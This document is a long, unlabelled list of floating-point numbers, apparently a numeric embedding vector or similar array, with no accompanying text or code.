0.006604955531656742, 0.01793823018670082, -0.006828682497143745, -0.014291814528405666, 0.00650477921590209, 0.005245897453278303, 0.020235605537891388, 0.011219741776585579, -0.0003733652993105352, -0.024416295811533928, -0.004120583645999432, 0.017978301271796227, -0.0019033490680158138, -0.0023975521326065063, 0.01359058078378439, -0.011373345740139484, -0.009643635712563992, 0.002122067380696535, 0.0003036593261640519, -0.030774150043725967, 0.03221668675541878, -0.010959283448755741, -0.013129769824445248, -0.03528875857591629, -0.025979045778512955, 0.0008444024715572596, -0.013223267160356045, 0.006685096304863691, 0.012902703136205673, -0.01669604517519474, -0.029224757105112076, 0.009242930449545383, -0.009777204133570194, 0.01610834337770939, 0.014852801337838173, -0.011914297938346863, 0.02545812912285328, 0.01212132815271616, 0.006451351568102837, 0.00021997038857080042, -0.02599240280687809, -0.005245897453278303, -0.009283000603318214, -0.015333647839725018, 0.00023604033049196005, -0.0014066417934373021, -0.019701333716511726, -0.005092293489724398, -0.017003251239657402, 0.023654956370592117, 0.00482515711337328, 0.00166710012126714, 0.011927654035389423, -0.00848826952278614, 0.0027999267913401127, 0.004304240457713604, -0.019901685416698456, -0.01516000833362341, -0.0028383275493979454, -0.010191265493631363, 0.01113292295485735, -0.029572034254670143, 0.005119007546454668, -0.01737724244594574, -0.013837682083249092, -0.0041105663403868675, -0.0011979412520304322, 0.015039796940982342, 0.0016370471566915512, -0.013249981217086315, 0.010531865060329437, -0.036544304341077805, 0.016655974090099335, 0.021170584484934807, -0.010912534780800343, 0.028583629056811333, -0.04546666890382767, 0.016709402203559875, 0.014599021524190903, 0.013296729885041714, -0.003826733445748687, -0.010010948404669762, -0.004584733862429857, 0.011760693974792957, -0.009202860295772552, -0.00947667472064495, -0.0007417217711918056, 0.007406365592032671, -0.0012213157024234533, -0.004197385627776384, 0.017564238980412483, 0.0006377889076247811, -0.006040628999471664, 0.009697062894701958, 0.00039861808181740344, -0.002975235227495432, -0.002851684344932437, 0.0034460637252777815, -0.0041673327796161175, 0.017297102138400078, 0.0015944723272696137, -0.00374325318261981, -0.009089326485991478, -0.0017163533484563231, -0.023067254573106766, -0.017871446907520294, -0.0050956327468156815, -0.028530200943350792, 0.004013729281723499, 0.009283000603318214, -0.0006319452659226954, 0.011900940909981728, 0.015614140778779984, -0.0016019855393096805, -0.010404975153505802, 0.012709029018878937, -0.03200297802686691, -0.018432432785630226, 0.014024677686393261, 0.019060203805565834, 0.004013729281723499, 0.0034327066969126463, 0.00337927951477468, -0.0011662187753245234, -0.0376395620405674, -0.014505523256957531, -0.00647806515917182, -0.016201842576265335, 0.0025428077206015587, 0.02796921506524086, -0.03141527622938156, 0.05398833006620407, 0.043436430394649506, 0.012949452735483646, -0.035555895417928696, 0.008261202834546566, 0.0505155548453331, -0.004805121570825577, 0.00292013818398118, 0.004701605997979641, -0.01570763811469078, -0.012501997873187065, -0.015867920592427254, 0.002329098293557763, 0.016068274155259132, -0.003539561526849866, 0.012047865428030491, -0.0001952393795363605, -0.003913552965968847, 0.009810595773160458, 0.0008331326534971595, 0.005316020455211401, 0.014919585548341274, 0.004558020271360874, -0.020008539780974388, -0.005155738443136215, 0.00020870055595878512, 0.01474594697356224, 0.0020402567461133003, 0.0009074300178326666, 0.011366667225956917, -0.01418495923280716, 0.0019968468695878983, -0.003536222269758582, -0.0046248044818639755, 0.004711623769253492, 0.012675637379288673, -0.01576106622815132, -0.0009283000836148858, 0.012582139112055302, 0.03865468129515648, 0.022706620395183563, -0.02259976603090763, -0.01001762691885233, -0.012388464994728565, 0.002152120228856802, 0.01910027489066124, -0.00983063131570816, -0.018352292478084564, 0.008541696704924107, -0.009743811562657356, -0.023748453706502914, -0.01323662418872118, 0.012274932116270065, 0.003903535194694996, -0.025631768628954887, 0.012916060164570808, 0.023294322192668915, 0.011179671622812748, 0.0035195262171328068, 0.007085801567882299, 0.004658196587115526, -0.0004290883371140808, 0.019020134583115578, 0.024282727390527725, 0.016776185482740402, -0.011293204501271248, 0.005062240641564131, -0.0033692617435008287, 0.008728692308068275, -0.0035262047313153744, 0.024509793147444725, 0.013717470690608025, -0.0007350433734245598, 0.0046081081964075565, 0.007686858996748924, 0.022158989682793617, 0.02288025990128517, -0.008140991441905499, 0.012548747472465038, 0.012047865428030491, -0.012201469391584396, -0.021117158234119415, -0.009429926052689552, -0.016856327652931213, -0.019420839846134186, -0.0026563408318907022, 0.00120628927834332, -0.018752997741103172, 0.016842970624566078, -0.016936467960476875, 0.022479554638266563, -0.014652448706328869, 0.003873482346534729, -0.0005576479015871882, 0.02107708714902401, 0.0012855954701080918, 0.005933774169534445, 0.01425174344331026, 0.019273914396762848, 0.011046103201806545, 0.021090444177389145, -0.004871905781328678, 0.006027271971106529, 0.01522679254412651, -0.023855308070778847, -0.021504506468772888, -0.009563494473695755, 0.0013006218941882253, -0.013570545241236687, -0.00036835650098510087, -0.005533069372177124, -0.03296466916799545, 0.02604582905769348, -0.011820799671113491, -0.003896856913343072, 0.0021087103523314, 0.0044244518503546715, 0.003332530613988638, 0.01697653904557228, -0.014959655702114105, 0.0027030897326767445, -0.005149060394614935, 0.006771915592253208, 0.01179408561438322, 0.020275676622986794, -0.02994602546095848, 0.0049553862772881985, -0.0028066050726920366, -0.018245438113808632, -0.012522033415734768, 0.015560713596642017, -0.011627125553786755, -0.003260737517848611, 0.003284112084656954, -0.001991838216781616, -0.003122160444036126, 0.006474726367741823, -0.0038567862939089537, -0.0328311026096344, -0.013283372856676579, -0.018712926656007767, -0.006992303766310215, 0.002330767922103405, 0.018031727522611618, -0.003689826000481844, 0.0014942960115149617, -0.004274187609553337, -0.0001608037855476141, 0.023681670427322388, -0.020128751173615456, 0.004504593089222908, -0.0035762928891927004, -0.010932570323348045, 0.0013966241385787725, -0.0018816442461684346, -0.015560713596642017, -0.015320290811359882, 0.004861888010054827, 0.014278457500040531, -0.019701333716511726, -0.004514610394835472, -0.015720995143055916, -0.02082330733537674, -0.012815884314477444, -0.00799406599253416, 0.002771543338894844, 0.020008539780974388, 0.010792323388159275, -0.004684910178184509, -0.005579818040132523, 0.021197298541665077, -0.009009186178445816, -0.013156482949852943, 0.015427145175635815, 0.0059838625602424145, 0.006594937760382891, -0.0019116970943287015, 0.015133295208215714, 0.011627125553786755, -0.00452128890901804, 0.014852801337838173, 0.00379668059758842, -0.019728045910596848, 0.022559694945812225, 0.009670348837971687, 0.004738337360322475, 0.0013649016618728638, 0.008307951502501965, 0.013209911063313484, -0.010284763760864735, -0.014892871491611004, -0.008822189643979073, -0.005329377483576536, -0.03435378149151802, -0.0007638440583832562, 0.006985625252127647, 0.020689738914370537, -0.0020469350274652243, 0.003516186960041523, -0.00918282475322485, -0.022452840581536293, -0.00933642778545618, 0.004484557546675205, 0.01286931149661541, 0.015266863629221916, -0.0021170584950596094, 0.00971709843724966, 0.004277526866644621, -0.005683333612978458, -0.014532237313687801, 0.004127262160181999, 0.027301372960209846, -0.028637055307626724, -0.028182923793792725, -0.009737133048474789, -0.012161399237811565, 0.007246083579957485, 0.00966367032378912, -0.004548002500087023, 0.004481218289583921, -0.005292646121233702, -0.016201842576265335, -0.006691774819046259, -0.01345033384859562, 0.0038367509841918945, 0.0023758471943438053, 0.00957685150206089, 0.014064747840166092, -0.00810759887099266, 0.019928399473428726, -0.010030983947217464, 0.015253506600856781, -0.019313985481858253, -0.012936095707118511, 0.01349040400236845, -0.003559596836566925, 0.0026062526740133762, 0.0017998336115851998, 0.000974214228335768, -0.02370838262140751, 0.01601484604179859, -0.00424413476139307, -0.015026439912617207, -0.008541696704924107, -0.003360913833603263, 0.005419536028057337, -0.008408128283917904, -0.026847239583730698, -0.006000558380037546, -0.0069121625274419785, 0.007019017357379198, 0.010091089643537998, 0.0012129676761105657, 0.0012163068167865276, 0.019086917862296104, 0.013423619791865349, 0.01497301273047924, 0.013430298306047916, 0.0017597631085664034, 0.001973472535610199, -0.007292832247912884, 0.0011937671806663275, -0.0016879701288416982, 0.010111124254763126, 0.003562935860827565, -0.003846768755465746, 0.019287271425127983, 0.017390599474310875, 0.005119007546454668, 0.009924128651618958, -0.013356835581362247, 0.017043322324752808, 0.020302390679717064, -0.004738337360322475, 0.017537524923682213, -0.007326224353164434, 0.005235879682004452, -0.00899582915008068, -0.007573326118290424, -0.00881551206111908, 0.0004315927508287132, -0.0061675189062952995, 0.000029218077543191612, 0.0029668870847672224, 0.028797337785363197, -0.014358598738908768, 0.021491149440407753, 0.02495056949555874, 0.0018382344860583544, 0.007072444539517164, 0.013891109265387058, 0.011486878618597984, -0.011480200104415417, 0.011947689577937126, -0.008561731316149235, -0.007680180482566357, -0.006210928782820702, -0.018525931984186172, -0.003930248785763979, -0.00013544666580855846, -0.015774423256516457, -0.003512847702950239, -0.0030169752426445484, 0.008014101535081863, 0.007199334446340799, 0.011039424687623978, -0.002517763525247574, -0.015280219726264477, 0.0037799845449626446, -0.003155552549287677, 0.01131324004381895, -0.0041940463706851006, 0.005506355781108141, -0.006474726367741823, 0.00770689407363534, 0.005359430331736803, 0.011306561529636383, 0.004768390208482742, -0.007680180482566357, -0.004952047020196915, -0.007052409462630749, -0.0284767746925354, -0.006785272620618343, 0.013577223755419254, -0.016175128519535065, -0.01518672239035368, -0.011012711562216282, -0.0029051117599010468, 0.019113631919026375, 0.007600039709359407, -0.012882668524980545, 0.004875245038419962, -0.010625363327562809, -0.005930434912443161, 0.011453486979007721, 0.024282727390527725, 0.008167705498635769, 0.02531120367348194, 0.021491149440407753, -0.000023087499357643537, 0.00031889445381239057, 0.01748409867286682, -0.010344869457185268, -0.03448735177516937, -0.015974774956703186, 0.0036831474862992764, 0.011687231250107288, 0.006401263643056154, 0.005219183396548033, 0.01771116442978382, 0.010144516825675964, -0.006277712993323803, -0.008922366425395012, 0.001000927877612412, 0.007673501968383789, -0.010845750570297241, -0.008755405433475971, -0.012922738678753376, 0.0015176704619079828, 0.0019000099273398519, -0.0020870056468993425, -0.004778407979756594, 0.006892127450555563, -0.007913924753665924, 0.00430090120062232, 0.015053153969347477, 0.014038034714758396, -0.01805844157934189, 0.010071054100990295, -0.006474726367741823, -0.014011320658028126, -0.007005660329014063, -0.020703095942735672, 0.007306189276278019, 0.013824325054883957, 0.0009683705866336823, -0.0033492266666144133, 0.010585292242467403, -0.002564512426033616, -0.001409980934113264, -0.0206763818860054, 0.01031147688627243, -0.009977556765079498, 0.0072527616284787655, -0.0042675090953707695, -0.000043514068238437176, 0.000847324263304472, -0.012128006666898727, -0.0030386801809072495, 0.04429126903414726, -0.020382530987262726, -0.01988832838833332, -0.014572307467460632, -0.00971709843724966, -0.009202860295772552, -0.010177908465266228, 0.005780170671641827, -0.01312309131026268, -0.002198869129642844, -0.010591970756649971, 0.00547296367585659, -0.03422021493315697, -0.00030950293876230717, 0.025097494944930077, -0.009116040542721748, 0.010284763760864735, -0.02543141506612301, 0.0032740943133831024, -0.012688994407653809, 0.004033764358609915, 0.0015953070251271129, 0.00205194391310215, 0.024402938783168793, -0.0017580934800207615, -0.015400432050228119, 0.01991504244506359, 0.002384195104241371, -0.01593470573425293, 0.013209911063313484, -0.04258159175515175, -0.02313403971493244, -0.007433079183101654, 0.025418058037757874, 0.022586409002542496, 0.00435766763985157, 0.0189533494412899, -0.0024476400576531887, 0.002846675692126155, -0.006210928782820702, -0.004901958629488945, -0.0037599492352455854, 0.010825715027749538, -0.003956962376832962, -0.004474539775401354, 0.013396906666457653, -0.003646416123956442, 0.0011628795182332397, -0.034059930592775345, 0.009643635712563992, -0.003130508353933692, -0.03731900081038475, -0.0323769710958004, -0.024429652839899063, -0.007239405065774918, -0.006998981814831495, -0.023721739649772644, -0.01337687112390995, 0.0289309062063694, 0.0019584461115300655, -0.004057138692587614, -0.02003525383770466, 0.0015310272574424744, 0.02231927216053009, 0.0019601157400757074, -0.0344606377184391, 0.007105836644768715, 0.015614140778779984, 0.005042205564677715, 0.017470741644501686, -0.00687209190800786, -0.011520271189510822, 0.0037799845449626446, -0.027808932587504387, 0.0023958825040608644, -0.00032536417711526155, 0.03152213245630264, 0.007466471288353205, 0.016175128519535065, -0.009930807165801525, -0.008555053733289242, -0.0021855123341083527, 0.001125313458032906, -0.015453859232366085, -0.005933774169534445, 0.000871533527970314, -0.021905209869146347, 0.0042675090953707695, 0.00043242756510153413, -0.021451078355312347, 0.026353036984801292, -0.0083213085308671, -0.00343604595400393, 0.00788053311407566, -0.021664787083864212, 0.0021387634333223104, 0.004684910178184509, 0.0075265769846737385, -0.010845750570297241, -0.014291814528405666, 0.005579818040132523, -0.015948062762618065, 0.0016178467776626348, 0.002873389283195138, -0.017510810866951942, -0.029064474627375603, 0.011887583881616592, -0.00871533527970314, 0.005633245687931776, 0.027595221996307373, 0.02520434930920601, -0.002589556621387601, -0.000014022069080965593, 0.004634822253137827, -0.0035529183223843575, -0.005519712343811989, 0.016482334583997726, 0.008381414227187634, -0.011072817258536816, 0.014799374155700207, -0.010151195339858532, 0.01799165830016136, 0.00031138124177232385, -0.00007570612797280774, -0.03144199028611183, 0.015013083815574646, -0.012301646173000336, 0.02946517989039421, -0.002210556296631694, 0.004033764358609915, 0.012087936513125896, -0.0033158345613628626, -0.020863378420472145, 0.01449216715991497, -0.034033216536045074, 0.011239777319133282, 0.006775254849344492, -0.003873482346534729, 0.013891109265387058, -0.013717470690608025, 0.01272906456142664, -0.0007980709196999669, 0.015827849507331848, 0.006741862744092941, -0.01841907575726509, -0.0033258520998060703, -0.003866804065182805, 0.005125685594975948, 0.0030921075958758593, 0.016883039847016335, -0.024910498410463333, -0.02214563451707363, 0.008782119490206242, 0.0007855488802306354, -0.017617667093873024, 0.008161026984453201, -0.002158798510208726, -0.01247528474777937, -0.013310086913406849, -0.013797610998153687, -0.01983490027487278, -0.003990354482084513, -0.003666451433673501, 0.009723776020109653, 0.005793527700006962, -0.0019584461115300655, 0.01743067055940628, 0.033605799078941345, -0.013891109265387058, -0.0077269296161830425, -0.011713945306837559, 0.0016003159107640386, -0.022893616929650307, -0.00965031422674656, 0.026740385219454765, -0.018379006534814835, -0.01080568041652441, -0.012996201403439045, 0.026393108069896698, -0.004885262809693813, 0.027728790417313576, -0.03285781666636467, -0.03149541839957237, -0.0019033490680158138, 0.004942029248923063, -0.0035829711705446243, -0.023441247642040253, -0.00792728178203106, 0.01783137582242489, 0.004704945255070925, 0.018659500405192375, 0.029572034254670143, -0.015827849507331848, -0.017110107466578484, -0.011560341343283653, -0.0011904280399903655, 0.013690756633877754, -0.0030587154906243086, -0.018766354769468307, -0.009984234347939491, 0.024536507204174995, -0.01955440826714039, -0.0025327899493277073, -0.003110473044216633, 0.018125226721167564, 0.0023541422560811043, 0.004163993522524834, 0.007259440142661333, 0.004861888010054827, -0.0072527616284787655, -0.006070681847631931, 0.010952604934573174, -0.0018532609101384878, 0.029812457039952278, 0.0034009842202067375, 0.00906929187476635, -0.012835918925702572, -0.03125499561429024, 0.0023975521326065063, 0.01821872405707836, 0.0308810044080019, -0.006554867140948772, -0.004361006896942854, -0.0037031827960163355, 0.01080568041652441, 0.009850666858255863, -0.00881551206111908, 0.014879515394568443, -0.021437721326947212, -0.015867920592427254, 0.013196554034948349, 0.004771729465574026, -0.03152213245630264, 0.005272611044347286, -0.0045079318806529045, -0.010965961962938309, -0.0007191821350716054, -0.002506076358258724, -0.004861888010054827, -0.033018097281455994, 0.011607090011239052, -0.010051018558442593, -0.005730082746595144, 0.012234861962497234, 0.010845750570297241, -0.0006423803279176354, -0.001077729742974043, -0.025124209001660347, 0.02130415290594101, 0.019594477489590645, 0.010992676019668579, -0.0007029034895822406, 0.017724521458148956, -0.006347835995256901, 0.014078104868531227, -0.006885448936372995, -0.0007191821350716054, 0.01150023564696312, -0.023641599342226982, 0.006337818689644337, 0.002564512426033616, 0.0035195262171328068, 0.009930807165801525, 0.012201469391584396, 0.0029101206455379725, 0.011553662829101086, -0.014265100471675396, 0.023321034386754036, -0.021437721326947212, -0.015841206535696983, -0.0036731299478560686, -0.024256013333797455, -0.015493929386138916, 0.015667568892240524, -0.010531865060329437, 0.007239405065774918, -0.020355816930532455, 0.011326597072184086, 0.015360360965132713, 0.0015168356476351619, 0.0053694481030106544, 0.003459420520812273, -0.02153121866285801, -0.0007646788726560771, 0.002557834144681692, 0.013276694342494011, 0.011513592675328255, 0.00461144745349884, -0.018886566162109375, 0.02036917395889759, 0.013583902269601822, -0.004017068538814783, -0.0005242557963356376, -0.0041038878262043, 0.021691501140594482, -0.0033525656908750534, -0.011486878618597984, 0.009162789210677147, -0.004220759961754084, 0.0049820998683571815, 0.018512574955821037, 0.018125226721167564, 0.010124481283128262, 0.013537152670323849, 0.02161136083304882, 0.017818018794059753, -0.005306003149598837, -0.0027815611101686954, -0.00910936202853918, -0.008822189643979073, -0.01773787848651409, -0.0012146373046562076, -0.012114649638533592, 0.006327800918370485, 0.008027458563446999, 0.006885448936372995, 0.008748727850615978, -0.02036917395889759, 0.0066383471712470055, -0.0002846675633918494, 0.012635566294193268, 0.007833784446120262, -0.008568409830331802, -0.004117244854569435, 0.009950842708349228, -0.0021471113432198763, -0.0021654770243912935, -0.025898905470967293, 0.00569335138425231, 0.008615159429609776, -0.027328085154294968, -0.02621946856379509, -0.0035762928891927004, 0.014505523256957531, -0.005603192839771509, -0.0031472044065594673, 0.033071525394916534, 0.005940452683717012, 0.012942774221301079, -0.017951587215065956, 0.0028566932305693626, 0.004280865658074617, -0.008514982648193836, -0.008795476518571377, -0.003903535194694996, -0.026593459770083427, -0.011700588278472424, 0.006361193023622036, 0.0009433265076950192, 0.004684910178184509, 0.00874204933643341, -0.005245897453278303, -0.007646788377314806, -0.007827105931937695, -0.014946299605071545, 0.007800391875207424, 0.00965031422674656, -0.018005015328526497, -0.0012613862054422498, -0.037505995482206345, -0.00672516692429781, -0.013810968026518822, -0.001258881762623787, -0.01932734064757824, 0.00008165409235516563, -0.006050646770745516, -0.016522405669093132, 0.010278085246682167, 0.010672111995518208, -0.0008673595148138702, 0.010972640477120876, 0.013690756633877754, 0.0041940463706851006, 0.00241591758094728, 0.01254206895828247, 0.017297102138400078, 0.01200779527425766, -0.0029852527659386396, 0.0076267533004283905, -0.005543086677789688, -0.02556498348712921, -0.02794250100851059, -0.0014500514371320605, -0.0005284298094920814, -0.010324833914637566, -0.000013591624338005204, -0.0066383471712470055, 0.007359616458415985, 0.011473521590232849, 0.019474266096949577, 0.005583157297223806, 0.013189875520765781, 0.02986588515341282, -0.021210655570030212, -0.006544849369674921, -0.014265100471675396, 0.013810968026518822, -0.015427145175635815, 0.005262593273073435, 0.016936467960476875, -0.0038901783991605043, -0.0008848903817124665, 0.008140991441905499, 0.009389855898916721, 0.015079868026077747, 0.0040671564638614655, 0.010698825120925903, 0.0009391524945385754, 0.00021277021733112633, 0.006064003333449364, -0.00385344703681767, -0.010765609331429005, -0.018579358235001564, -0.02477692998945713, 0.0028316492680460215, 0.01272906456142664, 0.027621936053037643, 0.0023641600273549557, -0.0004528802237473428, 0.013610615395009518, -0.015841206535696983, 0.00946331862360239, -0.013690756633877754, -0.013436976820230484, -0.024376224726438522, -0.03983008489012718, -0.015587427653372288, 0.004728320054709911, -0.03048029914498329, 0.012335037812590599, -0.006905484013259411, -0.0036030064802616835, 0.017270388081669807, 0.02731472998857498, -0.0026530015747994184, 0.004527967423200607, 0.0016462299972772598, -0.016281982883810997, 0.006107413209974766, 0.0008239498129114509, 0.011720623821020126, -0.009897415526211262, -0.018245438113808632, 0.008514982648193836, -0.005623227916657925, 0.009496710263192654, -0.018726283684372902, -0.011413415893912315, 0.028824051842093468, -0.0012229853309690952, 0.0013665712904185057, -0.02839663252234459, -0.022906973958015442, 0.013510439544916153, 0.0038066981360316277, 0.010912534780800343, -0.009035899303853512, -0.013176518492400646, 0.005543086677789688, -0.01474594697356224, 0.0004278361448086798, 0.0021437720861285925, 0.0104517238214612, 0.002439292147755623, 0.013363514095544815, 0.028530200943350792, -0.008541696704924107, 0.013784254901111126, -0.0018399041146039963, -0.015333647839725018, 0.009556815959513187, 0.004517949651926756, 0.013410262763500214, -0.011493557132780552, 0.007533255498856306, 0.00003420080247451551, 0.0028783981688320637, 0.009616921655833721, -0.00785381905734539, -0.026833882555365562, -0.023267608135938644, 0.006808646954596043, -0.008187740109860897, -0.00404712138697505, 0.04576051980257034, 0.01377089787274599, -0.005215844605118036, 0.009283000603318214, 0.019474266096949577, 0.00297356559894979, 0.02214563451707363, -0.001739727915264666, -0.005646602250635624, -0.019955113530158997, -0.04324943572282791, -0.007519898470491171, 0.0009107692167162895, 0.025885548442602158, 0.017003251239657402, 0.011920975521206856, -0.00672516692429781, -0.00589036475867033, 0.019968468695878983, -0.009269644506275654, -0.009957521222531796, 0.007780356798321009, 0.01080568041652441, 0.029732316732406616, 0.011927654035389423, -0.009262965992093086, -0.029678888618946075, 0.009556815959513187, 0.016001489013433456, -0.011660517193377018, -0.00004385320426081307, -0.01915370300412178, -0.01395789347589016, -0.015387075021862984, 0.005623227916657925, -0.028583629056811333, 0.01516000833362341, 0.014625735580921173, -0.011580376885831356, 0.01565421186387539, -0.027782218530774117, 0.016268625855445862, -0.007613396272063255, 0.0007079123170115054, 0.010925891809165478, -0.0008314630249515176, -0.007346259895712137, 0.008454876951873302, -0.03865468129515648, 0.0051958090625703335, 0.026740385219454765, -0.007760321721434593, -0.00799406599253416, -0.016428908333182335, -0.00042470564949326217, -0.006614972837269306, 0.008782119490206242, 0.027648650109767914, 0.00712587172165513, -0.019621191546320915, 0.006104073952883482, 0.013543831184506416, 0.0006995642906986177, 0.023908736184239388, -0.007433079183101654, -0.002674706280231476, 0.016829613596200943, -0.014078104868531227, -0.00896911509335041, 0.0036731299478560686, -0.008281238377094269, 0.035555895417928696, 0.021651430055499077, -0.0017038313671946526, -0.003876821603626013, -0.008848903700709343, -0.007720251102000475, -0.014532237313687801, -0.007980708964169025, 0.019287271425127983, -0.009136076085269451, 0.021517861634492874, -0.0004290883371140808, -0.000029974617063999176, -0.001991838216781616, -0.0022189044393599033, 0.015814494341611862, -0.0051123290322721004, -0.015720995143055916, 0.0007625918369740248, -0.002329098293557763, -0.018352292478084564, 0.012134685181081295, -0.006825343240052462, 0.015333647839725018, -0.004314257763326168, 0.011820799671113491, 0.007473149802535772, 0.012789170257747173, 0.004921994172036648, -0.02265319414436817, 0.03787998482584953, 0.0059938798658549786, -0.011834156699478626, -0.01616177149116993, -0.002696411218494177, -0.0030470280908048153, 0.013617293909192085, 0.029625462368130684, -0.0011937671806663275, -0.008100921288132668, -0.010979318991303444, -0.0020903449039906263, -0.0376395620405674, -0.005700029898434877, 0.011219741776585579, 0.019567765295505524, -0.005593175068497658, -0.018632786348462105, -0.004184028599411249, 0.004387720488011837, -0.010291442275047302, 0.0054696244187653065, -0.039028674364089966, 0.002946852007880807, -0.01548057235777378, -0.016121700406074524, -0.004714963026344776, -0.02064966782927513, -0.006945554632693529, -0.0032156582456082106, 0.006043968256562948, 0.018886566162109375, -0.02748836763203144, -0.004334293305873871, 0.02115722745656967, 0.007600039709359407, 0.0026496623177081347, -0.01119970716536045, 0.0008498287061229348, -0.00272312480956316, -0.01119970716536045, 0.019033491611480713, 0.010885820724070072, -0.005382804665714502, -0.006357853766530752, 0.007019017357379198, 0.006210928782820702, -0.0026262877508997917, 0.01168055273592472, -0.0014809392159804702, -0.0003051202220376581, -0.001691309385932982, -0.010839072056114674, -0.002467675367370248, 0.006972268223762512, -0.00527595030143857, 0.009189503267407417, -0.007893890142440796, -0.011273168958723545, -0.007960674352943897, -0.010104446671903133, 0.01856600120663643, -0.002950191032141447, 0.0075265769846737385, 0.016856327652931213, 0.008060850203037262, 0.016789542511105537, -0.016802899539470673, 0.003956962376832962, 0.02087673358619213, 0.00010361983004258946, 0.01337687112390995, -0.004591412376612425, -0.004304240457713604, 0.0061441445723176, 0.0034327066969126463, -0.012248218059539795, 0.004197385627776384, 0.0101578738540411, 0.00672516692429781, 0.023548102006316185, -0.009162789210677147, -0.018405720591545105, 0.005376126617193222, 0.01788480393588543, -0.024189230054616928, 0.0035028301645070314, 0.004471200983971357, 0.01493294257670641, -0.012822562828660011, 0.014478810131549835, -0.010591970756649971, 0.015333647839725018, -0.0013022915227338672, -0.013163161464035511, 0.0009900754084810615, -0.02348131686449051, -0.001312309061177075, -0.00558649655431509, -0.014064747840166092, -0.00589704280719161, -0.006578241474926472, 0.01689639687538147, -0.010872464627027512, 0.0008277064189314842, -0.006317783147096634, -0.014078104868531227, 0.001183749525807798, 0.01113292295485735, -0.013877752237021923, 0.015520643442869186, -0.003417680272832513, 0.004588073119521141, 0.0008790467400103807, -0.01261553168296814, 0.025364631786942482, -0.011119565926492214, -0.004297561943531036, -0.006731845438480377, -0.004805121570825577, 0.00645469082519412, 0.016602545976638794, -0.010244692675769329, 0.0037833238020539284, 0.0038801608607172966, 0.013430298306047916, -0.01646897941827774, 0.012074579484760761, -0.006337818689644337, -0.0022940365597605705, 0.003466098802164197, -0.010117802768945694, 0.011513592675328255, 0.017470741644501686, -0.020302390679717064, 0.002517763525247574, 0.00230572372674942, -0.0050388663075864315, -0.008875617757439613, 0.011406737379729748, -0.022786762565374374, 0.011961046606302261, 0.020021896809339523, -0.009723776020109653, 0.004514610394835472, -0.012695671990513802, 0.0010460071498528123, -0.0029084510169923306, 0.0052225226536393166, 0.002250626916065812, -0.012495320290327072, -0.0053527518175542355, 0.019901685416698456, 0.019995182752609253, -0.00991745013743639, -0.011707266792654991, 0.013944536447525024, 0.003559596836566925, 0.006685096304863691, -0.03269753232598305, 0.0144654531031847, -0.00670179259032011, 0.0000443488679593429, 0.003866804065182805, -0.00491531565785408, 0.011333275586366653, -0.008054171688854694, -0.010965961962938309, 0.004247473552823067, 0.015574070625007153, -0.012061222456395626, 0.006448012311011553, -0.009383177384734154, 0.0008631855016574264, -0.004320936277508736, 0.00028174574254080653, -0.0037332356441766024, 0.03232354298233986, 0.00788053311407566, -0.0046815709210932255, -0.01377089787274599, 0.007513219956308603, 0.013143126852810383, 0.01805844157934189, -0.014946299605071545, -0.025578340515494347, -0.02234598621726036, -0.007346259895712137, 0.009229573421180248, 0.009990912862122059, -0.005032187793403864, -0.01516000833362341, 0.01337687112390995, 0.01978147402405739, -0.004714963026344776, 0.007940638810396194, 0.014398668892681599, -0.010899177752435207, -0.02946517989039421, -0.03435378149151802, 0.00781374890357256, -0.0041940463706851006, 0.02265319414436817, -0.0069388761185109615, 0.0005572304944507778, 0.002238939516246319, -0.016989894211292267, -0.011179671622812748, 0.0061675189062952995, 0.02006196789443493, 0.014158246107399464, -0.0006561545305885375, 0.029117902740836143, 0.013423619791865349, 0.010071054100990295, -0.005372787360101938, 0.00918282475322485, 0.01295613031834364, 0.0028399971779435873, 0.016322053968906403, -0.01935405470430851, -0.017163533717393875, 0.030720721930265427, 0.0007542438106611371, -0.0018282169476151466, 0.012996201403439045, 0.0050388663075864315, -0.010278085246682167, 0.003746592439711094, 0.010538543574512005, -0.00014243813348002732, 0.03170912712812424, -0.010632040910422802, -0.00461144745349884, 0.007246083579957485, 0.0027348122093826532, -0.02802264131605625, -0.010097768157720566, 0.007493184879422188, 0.030640581622719765, 0.015119938179850578, 0.011319918558001518, 0.010438366793096066, -0.0017013269243761897, 0.007566647604107857, 0.01968797668814659, -0.03040015883743763, 0.015240149572491646, 0.013310086913406849, 0.04252816364169121, 0.010652076452970505, 0.0011403398821130395, 0.009817274287343025, -0.0076267533004283905, 0.017590953037142754, 0.015801137313246727, -0.012355073355138302, 0.0007943143136799335, 0.004861888010054827, 0.020970232784748077, 0.00047082846867851913, -0.008274559862911701, 0.02214563451707363, -0.0002291532146045938, -0.01200779527425766, -0.016402194276452065, 0.016081631183624268, 0.014599021524190903, 0.03136185184121132, -0.00806752871721983, -0.0007183473207987845, -0.017818018794059753, 0.011520271189510822, -0.0015285229310393333, -0.024897141382098198, 0.006304426584392786, 0.013810968026518822, 0.005589835811406374, -0.009910772554576397, -0.010064375586807728, -0.002736481837928295, -0.01765773631632328, 0.0006645025569014251, 0.0034527420066297054, 0.00910936202853918, -0.00047583726700395346, 0.006017254665493965, -0.019794831052422523, 0.0010810688836500049, -0.03686486557126045, -0.014198316261172295, -0.0029902616515755653, 0.0030587154906243086, 0.010872464627027512, -0.033071525394916534, -0.02019553631544113, -0.0006987294764257967, -0.003596327966079116, -0.017697807401418686, -0.00748650636523962, -0.004133940674364567, -0.00424413476139307, -0.0047817472368478775, -0.003385957796126604, -0.005523051600903273, 0.0060539860278368, 0.010344869457185268, -0.01867285557091236, -0.03595660254359245, -0.002031908603385091, -0.0006837030523456633, 0.004664875101298094, -2.282662414643255e-8, -0.0071859778836369514, -0.021798355504870415, -0.0001648734469199553, -0.025297846645116806, -0.015173365361988544, -0.016041560098528862, 0.0206763818860054, -0.02949189394712448, 0.01737724244594574, -0.0206763818860054, -0.009964199736714363, -0.0026580102276057005, -0.004761712159961462, 0.0001502644008724019, 0.007580004166811705, 0.024509793147444725, -0.026139328256249428, -0.0023725079372525215, -0.006805307697504759, 0.028556915000081062, -0.005576478783041239, 0.010465080849826336, 0.013463690876960754, 0.010091089643537998, 0.015560713596642017, 0.01943419687449932, 0.021851783618330956, -0.01393117941915989, 0.005997219122946262, 0.0027264640666544437, 0.0019400804303586483, 0.011600411497056484, -0.015774423256516457, 0.0164155513048172, 0.008768762461841106, 0.009656992740929127, -0.008014101535081863, 0.010251371189951897, 0.00226064445450902, 0.012301646173000336, 0.018779711797833443, -0.010905856266617775, -0.005165756214410067, -0.017804661765694618, -0.003110473044216633, 0.01735053025186062, -0.0075265769846737385, -0.017043322324752808, 0.023427890613675117, 0.024109087884426117, 0.016762828454375267, 0.0023190805222839117, 0.00446452246978879, 0.014866158366203308, 